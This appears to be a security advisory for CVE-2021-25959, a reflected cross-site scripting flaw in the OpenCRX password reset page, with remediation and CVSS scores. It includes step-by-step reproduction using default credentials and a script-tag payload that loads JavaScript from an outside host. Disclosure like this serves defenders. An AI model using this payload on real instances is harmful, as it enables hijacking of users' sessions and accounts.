We found results for “”
CVE-2021-25959
Date: September 28, 2021
Overview
In OpenCRX, versions v4.0.0 through v5.1.0 are vulnerable to reflected Cross-site Scripting (XSS), due to unsanitized parameters in the password reset functionality. This allows execution of external javascript files on any user of the openCRX instance.Details
OpenCRX is affected by a reflected XSS vulnerability that allows execution of external javascript files on any user of the openCRX instance. This vulnerability exists due to unsanitized parameters in the password reset functionality.PoC Details
Login to the application as guest:guest via visiting http://localhost:8080/opencrx-core-CRX.Click on Security, Request password reset. Click ok. A password request link shows up in the Alerts tab. Click on the yellow icon to open it. Copy the password reset URL. A password reset URL example looks like this:
“http://localhost:8080/opencrx-core-CRX/PasswordResetConfirm.jsp?t=cO6BzWLpIElr5CF4n8IjzzZPmKrOuE1OIcJLIMWZ&p=CRX&s=Standard&id=guest”.
In the `id` parameter, insert the given payload (note: Change ip and port accordingly).
Create a file poc.js locally and start a python server in the file directory where the JS file is present. Now login as admin-Standard:admin-Standard in a private window. Paste the URL with the payload in the `id` parameter value. The external JS file is successfully called.
PoC Code
<script src="http://10.0.2.15/poc.js"></script>
Affected Environments
v4.0.0 - v5.1.0Prevention
Upgrade to version org.opencrx:opencrx-core-config:5.2.0Language: Java
Good to know:
Base Score: |
|
---|---|
Attack Vector (AV): | Network |
Attack Complexity (AC): | Low |
Privileges Required (PR): | None |
User Interaction (UI): | Required |
Scope (S): | Changed |
Confidentiality (C): | Low |
Integrity (I): | Low |
Availability (A): | None |
Base Score: |
|
---|---|
Access Vector (AV): | Network |
Access Complexity (AC): | Medium |
Authentication (AU): | None |
Confidentiality (C): | None |
Integrity (I): | Partial |
Availability (A): | None |
Additional information: |